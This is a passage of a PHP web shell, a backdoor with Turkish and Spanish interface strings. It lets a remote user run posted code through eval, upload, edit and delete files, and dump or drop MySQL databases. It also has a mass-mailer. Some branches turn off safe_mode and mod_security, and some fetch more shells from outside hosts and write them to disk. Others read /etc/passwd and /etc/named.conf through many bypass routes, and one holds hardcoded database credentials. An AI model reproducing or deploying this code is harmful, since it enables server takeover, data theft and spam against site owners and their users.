1224. elseif (($id_menu == 'a_edit') &&(!trim($_GET['d']) == '') &&(!trim($_GET['a']) == ''))
1225. {
1226. echo '<br /><form method="post" action="">
1227. <input type="submit" value="Save" />
1228. <input type="reset" value="Reset" />
1229. <input type="button" value="Back" onclick="history.go(-1)"><br />
1230. <br />
1231. '.$lenguaje[60].':<br />
1232. <a href="?id=a_edit&amp;d='.$dir.'&amp;a='.urlencode($_GET['a']).'&w='.base64_encode('fread').'">fread</a> -
1233. <a href="?id=a_edit&amp;d='.$dir.'&amp;a='.urlencode($_GET['a']).'&w='.base64_encode('readfile').'">readfile</a> -
1234. <a href="?id=a_edit&amp;d='.$dir.'&amp;a='.urlencode($_GET['a']).'&w='.base64_encode('file_get_contents').'">file_get_contents</a><br />
1235.  
1236. <br /><br />';
1237. if (isset($_POST['c0d3']))
1238. {
1239. $fopen=@fopen(realpath($dir.'/'.$_GET['a']),'w+');
1240. $pwz=@fwrite($fopen,stripslashes($_POST['c0d3']));
1241. @fclose($fopen);
1242. if($pwz)
1243. {
1244. echo '<b>OK !!! -> <font color="green">'.$lenguaje[61].'</font></b><br />';
1245. }
1246. else
1247. {
1248. echo '<b>Err0r !!! -> <font color="red">'.$lenguaje[62].'</font></b><br />';
1249. }
1250. }
1251. echo '<textarea name="c0d3" cols="80" rows="20">';
1252. if ($_GET['w'] == base64_encode('fread'))
1253. {
1254. $fopen=@fopen(realpath($dir.'/'.$_GET['a']),'r');
1255. $tam=@filesize(realpath($dir.'/'.$_GET['a']));
1256. if ($tam >0)
1257. {
1258. $read=@fread($fopen,$tam);
1259. echo htmlentities($read);
1260. }
1261. }
1262. elseif ($_GET['w'] == base64_encode('readfile'))
1263. {
1264. ob_start('buffer_exec');
1265. readfile(realpath($dir.'/'.$_GET['a']));
1266. ob_end_flush();
1267. echo $Sonuç;
1268. }
1269. else
1270. {
1271. echo htmlentities(file_get_contents(realpath($dir.'/'.$_GET['a'])));
1272. }
1273. echo '</textarea></form>';
1274. }
1275. elseif ($id_menu == 'phpinfo')
1276. {
1277. phpinfo();
1278. }
1279. elseif ($id_menu == 'php_exec')
1280. {
1281. if (isset($_POST['c0d3_3x3c']))
1282. {
1283. @chdir($dir);
1284. echo '<textarea cols="100" rows="16" name="phpcode">';
1285. ob_start('buffer_exec');
1286. eval(stripslashes($_POST['c0d3_3x3c']));
1287. ob_end_flush();
1288. echo $Sonuç;
1289. echo '</textarea><br /><br />';
1290. }
1291. echo $lenguaje[63].'<br />
1292. <form method="post" action="">
1293. <textarea name="c0d3_3x3c" cols="80" rows="12">';
1294. if (isset($_POST['c0d3_3x3c']))
1295. {
1296. echo stripslashes(htmlspecialchars($_POST['c0d3_3x3c']));
1297. }
1298. echo '</textarea><br /><br />
1299. <input type="submit" value="OK">
1300. <input type="reset" value="Reset">
1301. </form>';
1302. }
1303. elseif (($id_menu == 'upload_fil3') &&(isset($_FILES['uploadfile'])))
1304. {
1305. global $_FILES;
1306. global $dir;
1307. $uploadfile = $_FILES['uploadfile'];
1308. if (!empty($uploadfile['tmp_name']))
1309. {
1310. if (empty($uploadfilename))
1311. {
1312. $destin = $uploadfile['name'];
1313. }
1314. else
1315. {
1316. $destin = $userfilename;
1317. }
1318. if (!move_uploaded_file($uploadfile['tmp_name'],$dir.'/'.$destin))
1319. {
1320. echo $lenguaje[64].' '.$uploadfile['name'].' ('.$lenguaje[65].'"'.$uploadfile['tmp_name'].'" '.$lenguaje[66].' '.$dir.'"!<br />';
1321. }
1322. else
1323. {
1324. echo '<font color="green">'.$lenguaje[67].' ("'.$uploadfile['name'].'" '.$lenguaje[66].' -> '.$dir.')</font><br /><br />';
1325. }
1326. }
1327. listar_archivos($dir);
1328. }
1329. elseif ($id_menu == 'f0rm_exec')
1330. {
1331. f0rm_exec($dir);
1332. }
1333. elseif ($id_menu == 'c0d3_3x3c')
1334. {
1335. f0rm_exec($dir);
1336. echo '<textarea name="c0d3" cols="80" rows="20">'.c0d3_ex3c($_POST['ax3'],$dir).'</textarea><br />';
1337. }
1338. elseif ($id_menu == 'upload_fil3')
1339. {
1340. echo '<b>'.htmlentities($dir).'</b><br /><br />';
1341. upload_file($dir);
1342. }
1343. elseif (($id_menu == 'rmdir') &&(!trim($_GET['d1r']) == ''))
1344. {
1345. if (isset($_POST['rm_ok']))
1346. {
1347. $rm_dir=rm_items_pwn(realpath($_GET['d1r'].'/'));
1348. if($rm_dir)
1349. {
1350. echo '<b><font color="green">'.$lenguaje[68].'! -> '.htmlentities(stripslashes($_GET['d1r'])).'</font></b><br /><br />';
1351. }
1352. else
1353. {
1354. echo '<b><font color="red">Err0r !!! -> '.htmlentities(stripslashes($_GET['d1r'])).'</font></b><br /<br />';
1355. }
1356. listar_archivos($dir);
1357. }
1358. else
1359. {
1360. echo $lenguaje[88].' <font color="red"><b>'.htmlentities(stripslashes($_GET['d1r'])).'</b></font> ?<br />
1361.         <form action="" method="POST">
1362.         <input type="hidden" name="rm_ok" value="1">
1363.         <br />
1364.         <input type="submit" value="SI">
1365.         <form>
1366.         <br /><br />';
1367. }
1368. }
1369. elseif (($id_menu == 'rm_file') &&(!trim($_GET['fil3']) == ''))
1370. {
1371. if ((isset($_POST['rm_ok'])) &&($_POST['rm_ok']==1))
1372. {
1373. $unlink_fil3=@unlink($_GET['fil3']);
1374. if($unlink_fil3)
1375. {
1376. echo '<b><font color="green">'.$lenguaje[69].'! -> '.htmlentities(stripslashes($_GET['fil3'])).'</font></b><br /><br />';
1377. }
1378. else
1379. {
1380. echo '<b><font color="red">Err0r !!!  -> '.htmlentities(stripslashes($_GET['fil3'])).'</font></b><br /><br />';
1381. }
1382. listar_archivos($dir);
1383. }
1384. else
1385. {
1386. echo $lenguaje[87].' <font color="red"><b>'.htmlentities(stripslashes($_GET['fil3'])).'</b></font> ?<br /><form action="" method="POST">
1387.         <input type="hidden" name="rm_ok" value="1">
1388.         <br />
1389.         <input type="submit" value="SI">
1390.         <form>
1391.         <br /><br />';
1392. }
1393. }
1394. elseif (($id_menu == 'mkdir') &&(!trim($_GET['d']) == ''))
1395. {
1396. if (isset($_POST['dir_name']))
1397. {
1398. $mkdir_f=@mkdir($dir.'/'.trim($_POST['dir_name']));
1399. if($mkdir_f)
1400. {
1401. echo '<b><font color="green">'.$lenguaje[70].'! -> '.htmlentities($_POST['dir_name']).'</font></b><br /><br />';
1402. }
1403. else
1404. {
1405. echo '<b><font color="red">Err0r !!!</font></b><br /><br />';
1406. }
1407. }
1408. else
1409. {
1410. echo '<form method="post" action="">
1411.          <table width="214" border="0" cellspacing="0" cellpadding="0">
1412.          <tr valign="top">
1413.          <td width="58" height="30">'.$lenguaje[71].': </td>
1414.          <td width="144"><input type="text" name="dir_name" /></td>
1415.          </tr>
1416.          <tr valign="top" align="center">
1417.          <td colspan="2"><input type="submit" value="'.$lenguaje[72].'" /></td>
1418.          </tr>
1419.          </table>
1420.          </form>';
1421. }
1422. listar_archivos($dir);
1423. }
1424. elseif (($id_menu == 'mkfile') &&(isset($_GET['d'])))
1425. {
1426. if (isset($_POST['fil3_name']))
1427. {
1428. $fopen=@fopen($dir.'/'.$_POST['fil3_name'],'w+');
1429. @fwrite($fopen,stripslashes($_POST['fil3_content']));
1430. @fclose($fopen);
1431. if($fopen)
1432. {
1433. echo '<b><font color="green">'.$lenguaje[73].'! -> '.htmlentities($_POST['fil3_name']).'</font></b><br /><br />';
1434. }
1435. else
1436. {
1437. echo '<b><font color="red">Err0r!!!</font></b><br /><br />';
1438. }
1439. listar_archivos($dir);
1440. }
1441. else
1442. {
1443. echo '<form method="post" action="">
1444.          <table border="0" cellspacing="0" cellpadding="0">
1445.          <tr valign="top">
1446.          <td height="30">'.$lenguaje[74].': </td>
1447.          <td width="140">
1448.          <input type="text" name="fil3_name" />
1449.          </td>
1450.          </tr>
1451.          <tr valign="top" align="center">
1452.          <td colspan="2"><input type="submit" value="'.$lenguaje[75].'" /></td>
1453.          </tr>
1454.          </table>
1455.          <br />
1456.          <textarea name="fil3_content" cols="80" rows="12"></textarea>
1457.          </form>';
1458. }
1459. }
1460. elseif (($id_menu == 'fdown') &&(!trim($_GET['fil3_down']) == ''))
1461. {
1462. if (!trim($_GET['fil3_path'])=='')
1463. {
1464. $fil3_down=str_replace(' ','_',$_GET['fil3_down']);
1465. $fil3_path=$_GET['fil3_path'];
1466. $fp = @fopen($fil3_path,'rb');
1467. header('Content-Disposition: attachment; filename='.$fil3_down);
1468. header('Content-Length: '.filesize($fil3_path));
1469. fpassthru($fp);
1470. @fclose($fp);
1471. }
1472. else
1473. {
1474. $homedir=getcwd();
1475. $dir=realpath($_GET['d']);
1476. css();
1477. header_index();
1478. echo $lenguaje[76].' <br /> <br />';
1479. echo '<a href="'.$_SERVER['SCRIPT_NAME'].'">'.$lenguaje[77].'</a>';
1480. }
1481. }
1482. if ($id_menu=='log_mysql')
1483. {
1484. if ((!$_GET['userm']=='') &&(!$_GET['hostm']==''))
1485. {
1486. if (post_form_mysql($_GET['hostm'],$_GET['userm'],$_GET['passm']))
1487. {
1488. echo '<div align="center">'.$lenguaje[78].': <br /><br />
1489.              <a href="?id=listar_dbs&userm='.base64_encode($_GET['userm']).'&passm='.base64_encode($_GET['passm']).'&hostm='.base64_encode($_GET['hostm']).'">'.$lenguaje[79].'</a><br />
1490.              <a href="?">'.$lenguaje[80].'</a></div>';
1491. }
1492. else
1493. {
1494. echo $lenguaje[81];
1495. }
1496. }
1497. else
1498. {
1499. echo 'Error<br />';
1500. }
1501. }
1502. elseif ($id_menu=='listar_dbs')
1503. {
1504. if (post_form_mysql($hostm,$userm,$passm))
1505. {
1506. listar_dbs();
1507. }
1508. else
1509. {
1510. echo $lenguaje[81];
1511. }
1512. }
1513. elseif ($id_menu=='list_tb')
1514. {
1515. if (post_form_mysql($hostm,$userm,$passm))
1516. {
1517. listar_tbs($_GET['dbname']);
1518. }
1519. else
1520. {
1521. echo $lenguaje[81];
1522. }
1523. }
1524. elseif (($id_menu=='ver_schema') &&(!$_GET['tbname']=='') &&(!$_GET['db']==''))
1525. {
1526. if (post_form_mysql($hostm,$userm,$passm))
1527. {
1528. ver_schema($_GET['tbname'],$_GET['db']);
1529. }
1530. else
1531. {
1532. echo $lenguaje[81];
1533. }
1534. }
1535. elseif (($id_menu=='mostrar_datos') &&(!$_GET['tbname']==''))
1536. {
1537. if (post_form_mysql($hostm,$userm,$passm))
1538. {
1539. echo '<a href="?id=list_tb&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'&dbname='.htmlspecialchars($_GET['db']).'">'.$lenguaje[25].'</a><br /><br />';
1540. $paginaz=$_GET[pag];
1541. if (trim($paginaz)=='')
1542. {
1543. $paginaz=0;
1544. }
1545. if (is_numeric($paginaz))
1546. {
1547. paginar($_GET['tbname'],$_GET['db']);
1548. echo '<br />';
1549. mostrar_datos($_GET['tbname'],$_GET['db'],$paginaz,30);
1550. }
1551. }
1552. else
1553. {
1554. echo $lenguaje[81];
1555. }
1556. }
1557. elseif (($id_menu=='dump3r') &&(isset($_GET['db'])))
1558. {
1559. if (isset($_GET['tablename']))
1560. {
1561. dump3r($userm,$passm,$hostm,$_GET['db'],$_GET['tablename']);
1562. }
1563. else
1564. {
1565. dump3r($userm,$passm,$hostm,$_GET['db'],'');
1566. }
1567. }
1568. elseif (($id_menu=='drop_db') &&(!$_GET['dbname']==''))
1569. {
1570. if (post_form_mysql($hostm,$userm,$passm))
1571. {
1572. drop_db($_GET['dbname']);
1573. }
1574. else
1575. {
1576. echo $lenguaje[81];
1577. }
1578. }
1579. elseif (($id_menu=='drop_tb') &&(!$_GET['dbname']=='') &&(!$_GET['tbname']==''))
1580. {
1581. if (post_form_mysql($hostm,$userm,$passm))
1582. {
1583. drop_tb($_GET['tbname'],$_GET['tbname']);
1584. }
1585. else
1586. {
1587. echo $lenguaje[81];
1588. }
1589. }
1590. elseif ($id_menu=='mysql_login')
1591. {
1592. login_form_mysql();
1593. }
1594. elseif ($id_menu=='mail3r')
1595. {
1596. if (!$_POST)
1597. {
1598. form_mailer();
1599. }
1600. else
1601. {
1602. form_mailer();
1603. $paratal_emails = split("
1604. ",$_POST['maillist']);
1605. $count_emails = count($paratal_emails);
1606. for($x=0;$x<$count_emails;$x++)
1607. {
1608. $para = $paratal_emails[$x];
1609. if ($para)
1610. {
1611. $contenido = ereg_replace('&email&',$para,$_POST['contenido']);
1612. $titulo = ereg_replace('&email&',$para,$_POST['titulo']);
1613. $header  = "From: $_POST[nombre] <$_POST[email]>
1614. ";
1615. $header .= "MIME-Version: 1.0
1616. ";
1617. $header .= "Content-Type: text/html
1618. ";
1619. $header .= "Content-Transfer-Encoding: 8bit
1620.  
1621. ";
1622. $header .= "$contenido
1623. ";
1624. if(mail($para,$titulo,'',$header))
1625. {
1626. print '<b>'.$para.'</b> -->> '.$lenguaje[82].'<br />';
1627. }
1628. else
1629. {
1630. echo '<b>'.$para.'</b> -->> '.$lenguaje[83].'<br />';
1631. }
1632. }
1633. flush();
1634. ob_flush();
1635. }
1636. echo 'Fin :D';
1637. }
1638. }
1639. elseif ($id_menu=='crawl3r')
1640. {
1641. crawl3r();
1642. }
1643. elseif ($id_menu=='checkbox_form')
1644. {
1645. if ($_POST['menu_dirs'] == 'borrar')
1646. {
1647. if ((isset($_POST['directorios_confirmados'])) or (isset($_POST['archivos_confirmados'])) or (isset($_POST['directorios'])) or (isset($_POST['archivos'])))
1648. {
1649. @borrrar_checkbox(realpath($_POST['dir']),$_POST['directorios'],$_POST['archivos']);
1650. }
1651. else
1652. {
1653. echo $lenguaje[95].'<br /><br />';
1654. }
1655. }
1656. }
1657. elseif (($id_menu=='pwn_chmod') &&(isset($_GET['pwnd'])))
1658. {
1659. pwn_chmod($_GET['pwnd']);
1660. }
1661. elseif ($id_menu=='reverse_dns')
1662. {
1663. reverse_dns();
1664. }
1665. if (($id_menu!='phpinfo') &&($id_menu!='fdown') &&($id_menu!='dump3r') &&($id_menu!='proxy'))
1666. {
1667. echo '<br />
1668.  
1669.      </div>';
1670. }
1671. if ($_GET[id]=='info'){
1672. phpinfo();
1673. }
1674. if ($_GET[id]=='phpini'){
1675. $File = 'php.ini';
1676. $Handle = fopen($File,'w');
1677. $Data = "safe_mode = off
1678. ";
1679. fwrite($Handle,$Data);
1680. $Data = "disable_functions = NONE
1681. ";
1682. fwrite($Handle,$Data);
1683. print 'Baþarýlý!!';
1684. fclose($Handle);
1685. }
1686. if ($_GET[id]=='get'){
1687. $file = file_get_contents('http://kordonfilm.com/priv/Siyanur5xFull.txt');
1688. $b = fopen('Siyanur5x.php','w');
1689. fwrite($b,$file);
1690. fclose($b);
1691. print 'Baþarýlý ! <a href=Siyanur5x.php></a>';
1692. }
1693. if ($_GET[id]=='angel'){
1694. $file = file_get_contents('http://kordonfilm.com/priv/4ngel.txt');
1695. $b = fopen('angel.php','w');
1696. fwrite($b,$file);
1697. fclose($b);
1698. print 'Baþarýlý ! <a href=angel.php></a>';
1699. }
1700. if ($_GET[id]=='passwd'){
1701. $output = shell_exec('cat /etc/passwd > passwd.txt');
1702. echo 'Baþarýlý ! <a href=passwd.txt>passwd.txt</a>';
1703. }
1704. if ($_GET[id]=='usr'){
1705. $output = shell_exec('ls /var/mail > users.txt');
1706. echo 'Baþarýlý ! <a href=users.txt>users.txt</a>';
1707. }
1708. if ($_GET[id]=='hta'){
1709. $File = '.htaccess';
1710. $Handle = fopen($File,'w+');
1711. $Data = '<IfModule mod_security.c>
1712. FucKFilterEngine Off
1713. FucKFilterScanPOST Off
1714. FucKFilterCheckURLEncoding Off
1715. FucKFilterCheckUnicodeEncoding Off
1716. </IfModule>';
1717. fwrite($Handle,$Data);
1718. print 'Baþarýlý!!';
1719. fclose($Handle);
1720. }
1721. if ($_GET[id]=='cgitelnet'){
1722. $kokdosya = '.htaccess';
1723. $dosya_adi = "$kokdosya";
1724. $dosya = fopen ($dosya_adi ,'w') or die ('Dosya açýlamadý!');
1725. $metin = 'Options FollowSymLinks MultiViews Indexes ExecCGI
1726. AddType application/x-httpd-cgi .truy
1727. AddHandler cgi-script .truy
1728. AddHandler cgi-script .truy';
1729. fwrite ( $dosya ,$metin ) ;
1730. fclose ($dosya);
1731. $file = fopen('mectruy.truy','w+');
1732. $sa=file_get_contents('http://firmareklam.net/box/cgitelnet.txt');
1733. $write = fwrite ($file ,$sa);
1734. fclose($file);
1735. if ($write) {
1736. echo "<b><a href='mectruy.truy'>mectruy.truy</a></b> adýnda Cgitelnet oluþturuldu.<br>.htaccess .truy uzantýya destek verecek þekilde düzenlendi<br>Telnet giriþ þifresi<b><font color=red>mectruy</font></b></br>";
1737. }
1738. else {echo'"error"';}
1739. $chm = chmod('mectruy.truy',0755);
1740. if ($chm == true){
1741. echo 'Chmod 755 olarak ayarlandý';
1742. }else{
1743. echo 'chmod verilemedi';
1744. }
1745. }
1746. if ($_GET[id]=='tmplink'){
1747. mkdir('abc');
1748. chdir('abc');
1749. mkdir('etc');
1750. chdir('etc');
1751. mkdir('passwd');
1752. chdir('..');
1753. mkdir('abc');
1754. chdir('abc');
1755. mkdir('abc');
1756. chdir('abc');
1757. mkdir('abc');
1758. chdir('abc');
1759. chdir('..');
1760. chdir('..');
1761. chdir('..');
1762. chdir('..');
1763. symlink('abc/abc/abc/abc','tmplink');
1764. symlink('tmplink/../../../etc/passwd','exploit');
1765. unlink('tmplink');
1766. mkdir('tmplink');
1767. echo 'Tmplink oluþturuldu <a href=tmplink>tmplink</a> - <a href=abc>abc</a>';
1768. }
1769. if ($_GET[id]=='php44'){
1770. if ($_GET[id]=='php4'){
1771. }ELSE{
1772. $action = '?a=php4';
1773. echo "<html>
1774. <br>
1775. <head>
1776. <meta http-equiv='pragma' content='no-cache'>
1777. </head><body>";
1778. $r1s = fopen('.htaccess','w+');
1779. fwrite($r1s,'<Files *.php>
1780.   ForceType application/x-httpd-php4
1781. </Files>');
1782. echo '<b>sistem þuanda PHP4</b><br>';
1783. exit;
1784. }
1785. }
1786. if ($_GET[id]=='perm'){
1787. @mkdir('anjiyo');
1788. @chdir('anjiyo');
1789. @exec('curl http://kordonfilm.com/priv/ln.zip -o ln.zip');
1790. @exec('unzip ln.zip');
1791. @exec('chmod 755 ln');
1792. echo '<font color=green>[+] Dizin [ anjiyo ] adýyla oluþturuldu .</font><Br>';
1793. echo '<font color=green>[+] Dizin deðiþtirildi .</font><Br>';
1794. $file3 = 'Options Indexes FollowSymLinks
1795. DirectoryIndex ssssss.htm
1796. AddType txt .php
1797. AddHandler txt .php';
1798. $fp3 = fopen('.htaccess','w');
1799. $fw3 = fwrite($fp3,$file3);
1800. if ($fw3) {
1801. echo '<font color=green>[+] .htaccess yüklendi .</font><BR>';
1802. }
1803. else {
1804. echo '<font color=red>[+] Permission izin vermiyor .htaccess oluþturulamadý !</font><BR>';
1805. }
1806. @fclose($fp3);
1807. $lines3=@file('/etc/passwd');
1808. if (!$lines3) {
1809. $authp = @popen('/bin/cat /etc/passwd','r');
1810. $i = 0;
1811. while (!feof($authp))
1812. $aSonuç[$i++] = fgets($authp,4096);
1813. $lines3 = $aSonuç;
1814. @pclose($authp);
1815. }
1816. if (!$lines3) {
1817. echo "<font color=red>[+] Can't Read /etc/passwd File .</font><BR>";
1818. echo "<font color=red>[+] Can't Make The Users Shortcuts .</font><BR>";
1819. echo '<font color=red>[+] Finish !</font><BR>';
1820. }
1821. else {
1822. foreach($lines3 as $line_num3=>$line3){
1823. $sprt3=explode(':',$line3);
1824. $user3=$sprt3[0];
1825. @exec('./ln -s /home/'.$user3.'/public_html '.$user3);
1826. }
1827. echo '<font color=green>[+] Users Shortcut Created .</font><BR>';
1828. echo '<font color=green>[+] Finish !</font><BR>';
1829. }
1830. }
1831. if ($_GET[id]=='namedbypass'){
1832. $conf['groups'] = 1;
1833. $conf['accounts'] = array();
1834. $MySQL['host'] = '94.73.146.248';
1835. $MySQL['user'] = 'cihaz';
1836. $MySQL['pass'] = '00235154';
1837. $MySQL['db'] = 'paketleme';
1838. $IsCallableExt = create_function('$ext','
1839. // function IsCallableExt($ext)
1840. // {
1841.     echo "Deneniyor via {$ext} extension...";
1842.  
1843.     // Check whether this extension can be used
1844.     if ( @extension_loaded($ext) )
1845.     {
1846.         echo "extension loaded, Deneniyor...";
1847.         $ext = 1; // YAY, it has already been enabled!
1848.     }
1849.     else
1850.     {
1851.         echo "extension is off. Deneniyor to load {$ext} extension...";
1852.  
1853.         // We must try to enable it!
1854.         if ( is_callable("dl") )
1855.         {
1856.             @dl((PHP_SHLIB_SUFFIX === "dll" ? "php_" : "").$ext.".".PHP_SHLIB_SUFFIX);
1857.         }
1858.  
1859.         // Check whether it worked
1860.         if ( @extension_loaded("posix") )
1861.         {
1862.             $ext = 1; // YAY, it worked!
1863.         }
1864.     }
1865. // }
1866. ');
1867. @ini_restore('safe_mode');@ini_set('safe_mode',0);
1868. @ini_restore('open_basedir');@ini_set('open_basedir','');
1869. @ini_restore('disable_functions');@ini_set('disable_functions','');
1870. if ( is_callable('ini_get') &&ini_get('error_reporting') )
1871. {
1872. $conf['safe_mode'] = ini_get('safe_mode');
1873. }
1874. echo 'Safe-Mode is '.($conf['safe_mode'] ?'on': 'off')."<br />
1875. ";
1876. echo 'Deneniyor via backtick operator...';
1877. if ( !$conf['safe_mode'] )
1878. {
1879. $passwd = `cat /etc/named.conf`;
1880. if ( $passwd )
1881. {
1882. die("DONE!<br /><br /><br /><br />
1883. ".nl2br($passwd));
1884. }
1885. }
1886. echo "failed.<br />
1887. Deneniyor via system()...";$x = '';
1888. if ( @system('ls',$x) )
1889. {
1890. system('cat /etc/named.conf',$passwd);
1891. if ( $passwd )
1892. {
1893. die("DONE!<br /><br /><br /><br />
1894. ".nl2br($passwd));
1895. }
1896. }
1897. echo "failed.<br />
1898. Deneniyor via shell_exec()...";
1899. if ( @shell_exec('ls') )
1900. {
1901. $passwd = shell_exec('cat /etc/named.conf');
1902. if ( $passwd )
1903. {
1904. die("DONE!<br /><br /><br /><br />
1905. ".nl2br($passwd));
1906. }
1907. }
1908. echo "failed.<br />
1909. Deneniyor via readfile()...";
1910. if ( @readfile('/etc/named.conf') )
1911. {
1912. die();
1913. }
1914. echo "failed.<br />
1915. Deneniyor via file_get_contents()...";
1916. if ( @is_readable('/etc/named.conf') )
1917. {
1918. $passwd = file_get_contents('/etc/named.conf');
1919. if ( $passwd )
1920. {
1921. die("DONE!<br /><br /><br /><br />
1922. ".nl2br($passwd));
1923. }
1924. }
1925. echo "failed.<br />
1926. Deneniyor via copy()...";
1927. if ( is_callable('copy') )
1928. {
1929. if ( @copy('compress.zlib:///etc/named.conf',dirname($_SERVER['SCRIPT_FILENAME']).'/file.txt') )
1930. {
1931. echo 'go to: '.dirname($_SERVER['SCRIPT_FILENAME']).'/file.txt';
1932. }
1933. }
1934. echo "failed.<br />
1935. Deneniyor via CURL...";
1936. if ( is_callable('curl_init') &&is_callable('curl_exec') )
1937. {
1938. $passwd = curl_init("file:///etc/named.conf ".'index.php');
1939. if ( curl_exec($passwd) )
1940. {
1941. var_dump(curl_exec($passwd));die();
1942. }
1943. }
1944. echo "failed.<br />
1945. ";
1946. if ( $IsCallableExt('posix') )
1947. {
1948. echo "done.<br />
1949. Deneniyor via posix_getpwuid()...";
1950. if ( is_callable('posix_getpwuid') )
1951. {
1952. $passwd = array();
1953. for ( $i=0;$i<5000;$i++)
1954. {
1955. $line = @posix_getpwuid($i);
1956. if ( $line )
1957. {
1958. $passwd[$i] = $line;
1959. }
1960. }
1961. if ( count($passwd) )
1962. {
1963. die(implode("<br />
1964. ",$passwd));
1965. }
1966. }
1967. echo "failed.<br />
1968. Deneniyor via posix_getgrgid()...";
1969. if ( $conf['groups'] &&is_callable('posix_getgrgid') )
1970. {
1971. $passwd = array();
1972. for ( $i=0;$i<5000;$i++)
1973. {
1974. $line = @posix_getgrgid($i);
1975. if ( $line )
1976. {
1977. $passwd[$i] = $line;
1978. }
1979. }
1980. if ( count($passwd) )
1981. {
1982. die(implode("<br />
1983. ",$passwd));
1984. }
1985. }
1986. echo "failed.<br />
1987. Deneniyor via posix_getpwnam()...";
1988. if ( is_callable('posix_getpwnam') )
1989. {
1990. $passwd = array();
1991. foreach ( $conf['accounts'] as $account )
1992. {
1993. $passwd[$account] = posix_getpwnam($account);
1994. }
1995. if ( count($passwd) )
1996. {
1997. die(implode("<br />
1998. ",$passwd));
1999. }
2000. }
2001. echo "failed.<br />
2002. Deneniyor via posix_getgrnam()...";
2003. if ( $conf['groups'] &&is_callable('posix_getgrnam') )
2004. {
2005. $passwd = array();
2006. foreach ( $conf['accounts'] as $account )
2007. {
2008. $passwd[$account] = posix_getgrnam($account);
2009. }
2010. if ( count($passwd) )
2011. {
2012. die(implode("<br />
2013. ",$passwd));
2014. }
2015. }
2016. }
2017. echo "failed.<br />
2018. ";
2019. echo 'Deneniyor via MySQL (LOCAL-INFILE)...';
2020. if ( $MySQL['host'] &&$MySQL['user'] &&$MySQL['pass'] &&$MySQL['db'] )
2021. {
2022. mysql_connect($MySQL['host'],$MySQL['user'],$MySQL['pass']);
2023. mysql_select_db($MySQL['db']);
2024. mysql_query('CREATE TABLE adskfjlsdjf (a varchar(1024))');
2025. mysql_query("LOAD DATA LOCAL INFILE '/etc/named.conf' INTO TABLE adskfjlsdjf");
2026. $Query = mysql_query('SELECT a FROM adskfjlsdjf');
2027. if ( mysql_num_rows($Query) )
2028. {
2029. while ( $Row = mysql_fetch_row($Query) )
2030. {
2031. echo implode('',$Row)."
2032. <br />";
2033. }
2034. die();
2035. }
2036. }
2037. echo "failed.<br />
2038. ";
2039. if ( $IsCallableExt('perl') )
2040. {
2041. $perl = new perl();
2042. die($perl->eval("system('cat /etc/named.conf')"));
2043. }
2044. echo "failed.<br />
2045. ";
2046. if ( $IsCallableExt('ionCube Loader') )
2047. {
2048. $passwd = @ioncube_read_file('/etc/named.conf');
2049. if ( $passwd )
2050. {
2051. die(nl2br($passwd));
2052. }
2053. }
2054. echo "failed.<br />
2055. ";
2056. if ( $IsCallableExt('python') )
2057. {
2058. $passwd = python_eval("
2059. import os
2060. pwd = os.getcwd()
2061. print pwd
2062. os.system('cat /etc/named.conf')
2063. ");
2064. if ( $passwd )
2065. {
2066. die(nl2br($passwd));
2067. }
2068. }
2069. echo "failed.<br />
2070. ";
2071. echo '<br /><br />
2072. Unable to read /etc/named.conf, nothing worked.<br />';
2073. }
2074. if ($_GET[id]=='passwd1'){
2075. for($uid=0;$uid<2000;$uid++){
2076. $nothing = posix_getpwuid($uid);
2077. if (!empty($nothing)) {
2078. while (list ($key,$val) = each($nothing)){
2079. print "$val:";
2080. }
2081. print '<br />';
2082. }
2083. }
2084. }
2085. if ($_GET[id]=='yukle'){
2086. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
2087. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
2088. if( $_POST['_upl'] == 'Upload') {
2089. if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>Yükleme baþarýlý !!!</b><br><br>';}
2090. else {echo '<b>Yükleme baþarýsýz !!!</b><br><br>';}
2091. }
2092. echo '<a href=?a=phpini><input type="submit" value="Güvenlikleri kapat"></a>';
2093. }
2094. if ($_GET[id]=='pg'){
2095. echo "<form method=\"post\" action=\"\">";
2096. echo "<textarea name=\"site\" cols=\"60\" rows=\"10\"></textarea><br /><input type=\"submit\" value=\"sorgula\">";
2097. echo '<br>';
2098. ob_start();
2099. function StrToNum($Str,$Check,$Magic)
2100. {
2101. $Int32Unit = 4294967296;
2102. $length = strlen($Str);
2103. for ($i = 0;$i <$length;$i++) {
2104. $Check *= $Magic;
2105. if ($Check >= $Int32Unit) {
2106. $Check = ($Check -$Int32Unit * (int) ($Check / $Int32Unit));
2107. $Check = ($Check <-2147483648) ?($Check +$Int32Unit) : $Check;
2108. }
2109. $Check += ord($Str{$i});
2110. }
2111. return $Check;
2112. }
2113. function HashURL($String)
2114. {
2115. $Check1 = StrToNum($String,0x1505,0x21);
2116. $Check2 = StrToNum($String,0,0x1003F);
2117. $Check1 >>= 2;
2118. $Check1 = (($Check1 >>4) &0x3FFFFC0 ) |($Check1 &0x3F);
2119. $Check1 = (($Check1 >>4) &0x3FFC00 ) |($Check1 &0x3FF);
2120. $Check1 = (($Check1 >>4) &0x3C000 ) |($Check1 &0x3FFF);
2121. $T1 = (((($Check1 &0x3C0) <<4) |($Check1 &0x3C)) <<2 ) |($Check2 &0xF0F );
2122. $T2 = (((($Check1 &0xFFFFC000) <<4) |($Check1 &0x3C00)) <<0xA) |($Check2 &0xF0F0000 );
2123. return ($T1 |$T2);
2124. }
2125. function CheckHash($Hashnum)
2126. {
2127. $CheckByte = 0;
2128. $Flag = 0;
2129. $HashStr = sprintf('%u',$Hashnum) ;
2130. $length = strlen($HashStr);
2131. for ($i = $length -1;$i >= 0;$i --) {
2132. $Re = $HashStr{$i};
2133. if (1 === ($Flag %2)) {
2134. $Re += $Re;
2135. $Re = (int)($Re / 10) +($Re %10);
2136. }
2137. $CheckByte += $Re;
2138. $Flag ++;
2139. }
2140. $CheckByte %= 10;
2141. if (0 !== $CheckByte) {
2142. $CheckByte = 10 -$CheckByte;
2143. if (1 === ($Flag %2) ) {
2144. if (1 === ($CheckByte %2)) {
2145. $CheckByte += 9;
2146. }
2147. $CheckByte >>= 1;
2148. }
2149. }
2150. return '7'.$CheckByte.$HashStr;
2151. }
2152. function getpagerank($url) {
